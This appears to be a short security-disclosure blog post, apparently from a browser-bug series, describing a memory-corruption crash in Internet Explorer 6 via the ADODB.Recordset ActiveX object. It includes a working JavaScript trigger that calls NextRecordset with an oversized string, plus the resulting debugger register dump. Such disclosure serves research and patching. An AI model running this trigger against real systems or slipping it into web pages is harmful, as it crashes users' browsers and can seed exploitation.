The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the NextRecordset method repeatedly with a long string can result in an invalid memory access inside the SysFreeString function. This bug is similar to MoBB #8 and MoBB #21.
var a = new ActiveXObject('ADODB.Recordset');
var b = 'XXXX';
while (b.length <= 1024*512) b+=b;
for (var i = 0; i < 32768; i++) try { a.NextRecordset(b); } catch(e) {}
Demonstration
eax=00181358 ebx=0013b1c4 ecx=00000007
edx=0000400c esi=02d30020 edi=00000008
eip=77124874 esp=0013ae68 ebp=0013ae6c
OLEAUT32!SysFreeString+0x45:
77124874 8b0e mov ecx,[esi] ds:0023:02d30020=???
This bug will be added to the OSVDB:
Microsoft IE ADODB.Recordset SysFreeString Invalid Length
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment